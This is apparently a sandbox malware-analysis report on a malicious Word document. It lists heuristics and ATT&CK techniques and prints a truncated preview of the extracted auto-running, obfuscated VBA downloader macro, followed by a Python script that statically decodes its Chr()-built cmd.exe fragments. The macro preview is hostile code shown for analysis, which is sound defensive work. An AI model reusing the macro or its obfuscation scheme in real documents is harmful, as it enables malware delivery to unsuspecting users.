Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that runs automatically when the document is opened (a Document_open procedure). The analyzer flagged a Shell() call in the macro, a critical indicator on its own, and the extracted source shows how the command it runs is hidden: functions padded with junk arithmetic on never-assigned variables, command fragments assembled from string literals and Chr() calls whose arguments are buried in that arithmetic, and an Application.Run() call in Document_open that hands the assembled string to another macro procedure. Taken together, the auto-execution entry point, the Shell() call and the obfuscated command construction point to downloader or dropper functionality, i.e. a macro built to fetch and execute a secondary payload rather than to do anything in the document itself.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6615927-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware (signature Doc.Malware.Valyria-6615927-0).
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: the document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: the macro code calls Shell().
- Document_Open macro [high, OLE_VBA_DOCOPEN]: the macro defines a Document_Open procedure, which Word runs automatically when the document is opened.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: the compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches documents that ship only p-code, or whose compressed source stream cannot be extracted (so-called VBA stomping), where the visible source would otherwise show nothing.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55570 bytes | 9e8d13e667356730bc27d69eacf309f4408adeb6edda1109462f0fb21196aa8d |

Preview of macros.bas (first 1,000 lines of the extracted script). The file concatenates several VBA modules; each one starts with its own Attribute VB_Name line.
Attribute VB_Name = "QvbXRofjRVi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GzbHXUji()
KIcoA = 41709 * PpbYa - EEGoPG * hBhqW + 47269 / SbzDa
zVFGZi = 65823 * IpKJSN - RWlrJp * bmRcE + 6412 / qXzrGE
hqcSk = 87601 * jNFDdJ - Rjatqt * pzZiJ + 34631 / MSLIF
EuzwY = 12233 * iMzKFX - FKdhva * EMzRij + 15886 / tXLBz
Emawz = 57557 * DfbLv - DORKGA * hEiOAj + 91897 / vOink
End Function
Function JEvVYhsAKI()
zSuDsX = hwiwB - wHvAP / 98849 + ZBMmr / (QLHCi + 63896)
lSRoL = 84422 * ATMRou - VzZwp * QwFHLZ + 12375 / ZvDRiS
dLDHUZ = 65560 * VDXDqH - hscopN * cllva + 45277 / zFbBj
thVqO = 10277 * ICDFST - ZGiXb * iRWZw + 20289 / VwvCKk
HTHBh = coCcqV - ujkMs / 7969 + whSuP / (SLcvaL + 77700)
OuRtTj = ktUCS - CMzRZv / 70485 + zwjbYU / (ShsHs + 37125)
End Function
Private Sub Document_open()
On Error Resume Next
aXCKL = MMSvL - 34484 / JKDVG - YsiXM - (oIPShi * 64598 / (25329 * nadjVA - 96478 * 34323 / 65624 / 94442 * zKNjV + zRAQs))
raBLsP = vblOs - 81277 / IlOlbY - DutEo - (lBWTQ * 73315 / (79333 * AmMGZ - 74954 * 55088 / 42794 / 88494 * CzRoJY + YBnofI))
qvojIPNfhqC = Application.Run("ZcUkmikAru", "" + WKwtkRiE + jZmkRaaAan + CVar("c") + uizJjQMivao + pBYzfuuprzvmNA + oRvkl + FkZPLKGrSt + WplfwoIrl + WVoLwL + TPQNMOmt + zVZrWjnPOzW + asHFA + NFiImMw + ptmtKz + izfqt + CcEMFYRb + paUviR + BHjDPqdf + knzVYcqVGVk + tpdOz + jzAOHboL + BEbsPz + iSHrOG + ZQCHXNaOin + AZiiSzCPa + WCONNRUT + XKDjEntJRWZ + jPfGjYlblB + duERzGBW + BiBlZjAMBpmwrw)
kBPVdE = NJiRc - 66567 / wvjKWz - POHiw - (OajCG * 50464 / (11494 * zGmVz - 53564 * 77675 / 53910 / 82586 * YiFqq + hcuVV))
qhznn = fLBcbw - 78768 / oZVhnX - FSAYjR - (ifkAM * 96727 / (92761 * znAwLE - 43998 * 2646 / 57750 / 84059 * VtCZn + PPkPzP))
End Sub
Function QZdHInoMcSz()
mKEuO = (6250 * ukmkfl * (uRNslQ * 74626 * 57025 * jOvmCJ + (aBcPZN * 95213 + FlwBU + aCHvGF)))
NwaEh = (96980 * FoSTSM * (IiiCrw * 78387 * 19940 * jUuNw + (LYCET * 79298 + vFUKht + BWUTM)))
LHzzLV = (5843 * NkiwF * (EBFnWW * 43931 * 13422 * BYGjkw + (XCoWJB * 18084 + wMTqm + nbmUMw)))
JOEOEw = (33157 * ZMMKN * (EtfHqT * 92451 * 95512 * BwqOnH + (UIJIJ * 64546 + IAQRY + NQzvqk)))
End Function
Function jWsamqzz()
ZlrYjM = VLUwV - 825 / abLQbF - ZwRbl - (GfiqUT * 58967 / (46298 * tbwYF - 33227 * 2114 / 53231 / 34012 * wWqiK + IOcAnZ))
iTiBw = jLjZiQ - 26432 / HLQCIR - OMMvMV - (luhFkB * 45193 / (74028 * vEnRz - 77188 * 70706 / 1222 / 59538 * QmMwQd + OQGWFk))
HTbWXi = NpZsH - 18069 / VoaWQS - NuODlS - (iWrrKT * 82729 / (19264 * AsAEC - 11062 * 67007 / 95426 / 1286 * AIUKfv + zuYNSm))
YDpjii = (4269 * TXijS * (AtYWA * 37018 * 74972 * PAUBL + (CXOTf * 7638 + BbUznG + DSwaWE)))
joMoiQ = jhvbb - 11631 / SwiLZw - wmAXA - (DELXt * 51953 / (85034 * tDbBw - 55967 * 68188 / 43836 / 31113 * FQvIqH + adJkBM))
End Function
Attribute VB_Name = "DRIcYfTQqkk"
Function oRvkl()
On Error Resume Next
zjKLuj = 80404 / pmBWIU - (AUuriV + nFAdQ)
wwvTfr = (vFlwt / CaLAFY + SZfuAT - tFKQQB - rpGDcd / FPJtpl)
aPVkOmCzqN = CStr(Chr(PAMUAcnhiFuq + mjwjMIUkFhu + 109 + wPmakmjK + QmCzTMpM)) + "d /" + CStr(Chr(cPRlbFMRivfZ + oSsiJDLWK + 99 + wJLBYPVAShj + ziZRfjc)) + " ^fOR" + " ; " + "/^f ," + " " + " " + "; " + CStr(Chr(kIBUKCrZGEpFi + QGfKZdk + 34 + rffduqiwoG + zDESIta)) + " toke" + "ns= 2"
AYrLPY = 33292 / SLuRp / 90301 - irnKk - wcuuN * VBLiv - 61208 / JsYqh - YFkQj / PUpLz - 95780 * coDvwQ
XnISTaVOKEL = " " + " de" + "li" + CStr(Chr(vUiYAYBS + zDhcfXNi + 109 + qQYXzRCarQ + aLwLwFuR)) + "s=" + "HYF"
kujZcw = 26032 / SnQsI / 75137 - OOrnci - witpz * DiVVQH - 61613 / HJIopS - ViAlvX / QpnwK - 43146 * BfmAiD
zHdzld = 71710 / JBGsMA / 23866 - Ldwpj - NkFDXF * cafDcF - 55355 / jfljNC - rzQorj / mDYPJu - 86677 * iGfija
ucAHp = 11799 / izmMR / 50994 - tECHl - fiSzJ * GdWnGO - 22711 / jXloi - LGoLw / Xwlhw - 53546 *
... (truncated)
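The preview shows the obfuscation scheme at work: Document_open builds a long concatenation starting with CVar("c") and includes the result of oRvkl, and oRvkl assembles its fragments from string literals and CStr(Chr(...)) calls whose arguments are a constant surrounded by never-assigned names (for example Chr(PAMUAcnhiFuq + mjwjMIUkFhu + 109 + wPmakmjK + QmCzTMpM)). The script below is an added example, written for this page and not part of the report or of oletools, that statically resolves that pattern. It assumes (as noted in the code) that the unassigned names are uninitialised Variants, which VBA treats as 0 in arithmetic, so each Chr() argument collapses to its embedded constant; the sample input is the two string-building statements copied from the oRvkl listing above, plus two of the junk lines to show they are skipped.

```python
import re

# Constructed sample input: statements copied from the macro preview above
# (module DRIcYfTQqkk, Function oRvkl). The code in this block is an
# illustrative addition, not part of the report or of any tool it names.
SAMPLE_VBA = '''
On Error Resume Next
zjKLuj = 80404 / pmBWIU - (AUuriV + nFAdQ)
aPVkOmCzqN = CStr(Chr(PAMUAcnhiFuq + mjwjMIUkFhu + 109 + wPmakmjK + QmCzTMpM)) + "d /" + CStr(Chr(cPRlbFMRivfZ + oSsiJDLWK + 99 + wJLBYPVAShj + ziZRfjc)) + " ^fOR" + " ; " + "/^f ," + " " + " " + "; " + CStr(Chr(kIBUKCrZGEpFi + QGfKZdk + 34 + rffduqiwoG + zDESIta)) + " toke" + "ns= 2"
AYrLPY = 33292 / SLuRp / 90301 - irnKk - wcuuN * VBLiv - 61208 / JsYqh - YFkQj / PUpLz - 95780 * coDvwQ
XnISTaVOKEL = " " + " de" + "li" + CStr(Chr(vUiYAYBS + zDhcfXNi + 109 + qQYXzRCarQ + aLwLwFuR)) + "s=" + "HYF"
'''

# Assumption (mine, not the report's): identifiers that are never assigned are
# uninitialised Variants, which VBA coerces to 0 in arithmetic, so the junk
# operands around the constant do not change the Chr() result.
UNDEFINED_VALUE = 0

# CStr(Chr(<expr>)) or bare Chr(<expr>), where <expr> is an additive expression
# of identifiers and integer literals, as in the preview.
CHR_RE = re.compile(r'CStr\(Chr\(([^()]*)\)\)|Chr\(([^()]*)\)')
TERM_RE = re.compile(r'([+-]?)\s*(\d+|[A-Za-z_]\w*)')
# A VBA string literal; a doubled quote inside the literal stands for one quote.
STR_RE = re.compile(r'"((?:[^"]|"")*)"')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.MULTILINE)


def eval_int_expr(expr: str) -> int:
    """Evaluate an additive integer expression, treating unknown names as 0."""
    if not re.fullmatch(r'[\w\s+\-]+', expr):
        raise ValueError(f'unsupported Chr() argument: {expr!r}')
    total = 0
    for sign, term in TERM_RE.findall(expr):
        value = int(term) if term.isdigit() else UNDEFINED_VALUE
        total += -value if sign == '-' else value
    return total


def deobfuscate_concat(expr: str) -> str:
    """Collapse a VBA concatenation of literals and Chr() calls into one string."""
    def chr_to_literal(m: re.Match) -> str:
        code = eval_int_expr(m.group(1) or m.group(2))
        if not 0 <= code <= 255:  # Chr() only covers the single-byte range
            raise ValueError(f'Chr() argument out of range: {code}')
        return '"' + chr(code).replace('"', '""') + '"'

    # Step 1: turn every Chr() call into an equivalent string literal.
    flat = CHR_RE.sub(chr_to_literal, expr)
    # Step 2: keep the literals in order and drop the '+' glue between them.
    return ''.join(part.replace('""', '"') for part in STR_RE.findall(flat))


def recover_strings(vba_source: str) -> dict:
    """Return {variable: recovered string} for each assignment that builds a string."""
    recovered = {}
    for name, rhs in ASSIGN_RE.findall(vba_source):
        if '"' in rhs or 'Chr(' in rhs:  # pure junk arithmetic has neither
            recovered[name] = deobfuscate_concat(rhs)
    return recovered


# cmd.exe syntax that tends to surface once the fragments are readable:
# the /c switch, caret escapes, and the for /f tokens=/delims= options.
CMD_MARKERS = ('/c', '^', 'tokens=', 'delims=', 'for ', '/f')


def cmd_indicators(text: str) -> list:
    """List the cmd.exe markers present in a recovered fragment."""
    lowered = text.lower()
    return [marker for marker in CMD_MARKERS if marker in lowered]


if __name__ == '__main__':
    for name, value in recover_strings(SAMPLE_VBA).items():
        print(f'{name} = {value!r}  markers={cmd_indicators(value)}')
```

On the two statements from the preview this yields `md /c ^fOR ; /^f ,  ; " tokens= 2` and `  delims=HYF`. With the `CVar("c")` that Document_open prepends, the first fragment reads as the start of a caret-obfuscated `cmd /c for /f "tokens=2 delims=HYF" ...` loop, which is consistent with the Shell() downloader behaviour the heuristics report; the remaining pieces are in the truncated part of the listing. The approach is purely static: it only works while the Chr() arguments reduce to constants at parse time. Fragments that depend on values assigned at runtime, on ChrW(), or on environment lookups need a VBA emulator or a sandbox run instead.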